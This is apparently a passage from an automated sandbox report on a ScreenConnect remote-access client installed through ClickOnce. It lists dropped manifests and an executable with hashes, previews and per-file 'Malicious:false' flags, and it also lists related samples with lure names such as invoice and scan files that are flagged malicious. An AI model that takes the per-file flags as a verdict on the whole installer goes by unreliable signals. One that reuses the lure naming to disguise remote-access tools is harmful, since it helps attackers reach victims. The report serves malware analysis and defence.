                                                                                                                                                                                                                                                                        SHA-512:EEC2A37D40585E23BEBD3D4D70356E71F491CB5D91007FAA48A599A5020CEC22F2A0C2D2F36F5333524163C8022B7F907BB663D03E3CB9AA63476EC66F935199
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:PcmH.........)..gb.E#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........3..L.G.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...............................................X...............................................X...............................................X...............................................X...nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............D...........MdSp(...$...(...(...#............... urn:schemas

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.manifest

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1216
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                                                                                        MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                                                                                        SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                                                                                        SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                                                                                        SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.cdf-ms

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):5260
                                                                                                                                                                                                                                                                        Entropy (8bit):4.185506185194233
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:lNq6R84TeV+Ww7mk9O43jYHlIgBXw05X3W3wnjIbm:1R84UJC9tUHlXBXlZjd
                                                                                                                                                                                                                                                                        MD5:D73C912CA6C2686D8E92F5C70DBF57FF
                                                                                                                                                                                                                                                                        SHA1:663619BB39C9437E4664B06E3A499A4C1B750058
                                                                                                                                                                                                                                                                        SHA-256:E8A5DE1D7210D5A75B0AB1D93237EDA530B03EBF1E1770D1C0B38ECFB81A85E7
                                                                                                                                                                                                                                                                        SHA-512:0605A6F99DD3B6184B328113807F5682A214F310D258CD66979DADCAF82B65D5711C89FFF99B241EF050C583FB86593A75322034FCB67DF241EEC76ECA5A9FBC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:PcmH...............94...t.......T...............P...........3........<.g..J.|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$...........3..L.G.....[.......................z..w.....[~31.X....C.........y..&..d......B(.........^.ie...u"...F.....Ey%.....E..X.(...s".I...R)....+.`...m,......;../............... ...#...&...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........l...@.......................................(........... .......(...(...<.......d.......l.......|...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(...............d...........p...............................................X...............................................X...............................................X...............................................X.......................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.manifest

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1982
                                                                                                                                                                                                                                                                        Entropy (8bit):5.057585371364542
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                                                                                        MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                                                                                        SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                                                                                        SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                                                                                        SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.cdf-ms

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):6588
                                                                                                                                                                                                                                                                        Entropy (8bit):3.962933131280546
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:nMmxgeV+WwwU8WpUB96x9ESvdg98ujt5ZRksJqi/D5:jxPJwpCQx97vA8WXUw75
                                                                                                                                                                                                                                                                        MD5:0DCE618218A6E615DAE6E9E120E4DC72
                                                                                                                                                                                                                                                                        SHA1:C750B8E86BBA00F97B78FDA9CBF565D0A27C51D2
                                                                                                                                                                                                                                                                        SHA-256:9E082767E67FF1F5CDD3FD434551D86F4A6B6D07B4D9A55BEDD43D9037832634
                                                                                                                                                                                                                                                                        SHA-512:E7600B9F00DDA019E8893E2A50F62E50E341B510C0717A836E642EC6C9233410A5E0246213E58EE8ABEC667B872E10F4C20BA50D01B3C81251123B255C62C677
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:PcmH........."..D..2@...........T...............t...........?........<.g..J.|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.........}'.d................z..w.....[~31.X....y..&..d......B(.........C....."...^.ie...u%...[s.T..<(...s".I...R)...F.....Ey,.....E..X./...f..VC..2...O.&r..Vz5......;..8.....V....X;........... ...#...&...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...X...........@........................... .......0...(...8.......`.......h.......x...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(.......................(...$.......L.......T...(...l...................(.......................(...........................................................................X.......................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.manifest

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2573
                                                                                                                                                                                                                                                                        Entropy (8bit):5.026361555169168
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                                                                                        MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                                                                                        SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                                                                                        SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                                                                                        SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.cdf-ms

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3032
                                                                                                                                                                                                                                                                        Entropy (8bit):4.510369923107943
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:UvMQScUgIe6S+9oww7g47JNg0P/ruX3gnwbb:qXScIeV+WwwnHgLX3gnEb
                                                                                                                                                                                                                                                                        MD5:32A35F2EFE99C9752F95150E541110BC
                                                                                                                                                                                                                                                                        SHA1:E5DC52FB2EE7825A2C70CC7B6A7D0C4F5CC3FD16
                                                                                                                                                                                                                                                                        SHA-256:A9B521DDD0B94A417FC51686027DF50BFF6F79714791EBDAB1D015BB8BC91C54
                                                                                                                                                                                                                                                                        SHA-512:A5FBF8B89DA2AA525A5316FF649DC40D2321119AE816C1EFFBC7DC607F3DBA24CC9558978496FE8B70BE651873CD8605F57203ACF5432ACD7086EF1D70C9DDCF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:PcmH........D`.Z.f.............T....................................<.g..J.|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...........................................................X...............................................X...............................................X...nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............<...........MdSp ...$....... ..."............... urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.manifest

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1041
                                                                                                                                                                                                                                                                        Entropy (8bit):5.147328807370198
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                                                                                        MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                                                                                        SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                                                                                        SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                                                                                        SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.cdf-ms

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):14612
                                                                                                                                                                                                                                                                        Entropy (8bit):5.807948515435699
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:a9Wh4+An9q5s6IHoY8s8oXN8s8oTN2x2QPIlFDLhEDh7BqWoILgSl4uj:6WY9qS6ITX9dX9R/QPIBM7Y+lr
                                                                                                                                                                                                                                                                        MD5:CBA41DD6B2F1C63FE0B7F15C6A0D98DA
                                                                                                                                                                                                                                                                        SHA1:F0650F70FFF25C37E5303F0F27B6DD95F5B74059
                                                                                                                                                                                                                                                                        SHA-256:88179CFCD3CC5018DAED05014567C69F1DE987D510EC119F76E33D22D078709A
                                                                                                                                                                                                                                                                        SHA-512:8B4C3106A119938D909C3EDF0D61AD4D161CED32C99B066E5B08D32FF5B037BC5767F5751FD6FB9FE99E2724C8EF69F608012FC844400550E6D60683661A0735
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:PcmH.........UQ..tr$...@.......T...............8...........#........<.g..J.|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$...........3..L.G..........8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......@8......H8......P8......p8......t8..L...|8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%....]...Tk....Y?.Om...]............-........................E..................................X...4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.2.10.8991........................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.manifest

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):242016
                                                                                                                                                                                                                                                                        Entropy (8bit):5.858471214140723
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:0FcfiVIfQZlENURlENURlENURlENURlENUcmt8vOvP:Oc26UCUCUCUCUh2cP
                                                                                                                                                                                                                                                                        MD5:D8259314C0A0D0B11E4979470E4B973A
                                                                                                                                                                                                                                                                        SHA1:552BDA7DE4DB0B4DC772C578664DCBDCC9E58D6C
                                                                                                                                                                                                                                                                        SHA-256:B8289C61E2C1A1076D4244823E71CD2D877FEA82504B45B0C80753F5BABD9E12
                                                                                                                                                                                                                                                                        SHA-512:47A93656BAAAE18242B930BD6F2574E6C62286D965142F2C7DF431B0754F92EE142BC4FD8CA719EB14EB40FE4EDAEB95DBB7ED7528A9B2CCAB34063FD887F3B0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.cdf-ms

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4428
                                                                                                                                                                                                                                                                        Entropy (8bit):4.0764712625321975
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:pQKXCD5v+NgLe6S+9ow87gFW75uvW/vOTV4gQKLfOfTh5ukoDprOaJCf:pvX4eV+Ww8U45u0OOgQKLeThwkoNOrf
                                                                                                                                                                                                                                                                        MD5:732FD14667B1B15CB8790226CBECC20E
                                                                                                                                                                                                                                                                        SHA1:343741D9D188F1776E717754658F93999F7FCB05
                                                                                                                                                                                                                                                                        SHA-256:73E4660E107B15C868102F76D81E54CA22FDDF329A522AF9ADBC17AE30C2EC4B
                                                                                                                                                                                                                                                                        SHA-512:F697B86ADF2F17DB9CF7CFAADC74701A63D79F601841F23C5CC7CFE7C2F0A6B9F3A95029F6EE29A6393AF9C14B3E6A8C20924556768FF5B97B76582FCF501F8C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:PcmH.........9..2.(,...T.......T...............8...........+........<.g..J.|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$...........3..L.G........6...................z..w.....[~31.X....y..&..d......B(.........[s.T..<....s".I...R......E..X.!...O.&r..Vz$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......|...........(...............................(................... ...(...4.......\.......d...(...|...................(...............L...........0...............................................X...............................................X...............................................X...............................................X...............................................X...............................................X...nameScreenConnect.Cl

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.manifest

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1636
                                                                                                                                                                                                                                                                        Entropy (8bit):5.084538887646832
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                                                                                        MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                                                                                        SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                                                                                        SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                                                                                        SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):95520
                                                                                                                                                                                                                                                                        Entropy (8bit):6.505346220942731
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                                                                                        MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                                        SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                                                                                        SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                                                                                        SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                                                        • Filename: Scan_doc_09_16_24_1203.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: E_BILL0041272508.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: Scan_PDF_5255303072.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: invoice-benefits-agency9-24-2024.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: Scan_PDF_2017163298.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: He6pI1bhcA.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: 5eRyCYRR9y.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: VD01NDHM8u.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: vovE92JSzK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: s9POKY8U8k.exe, Detection: malicious, Browse
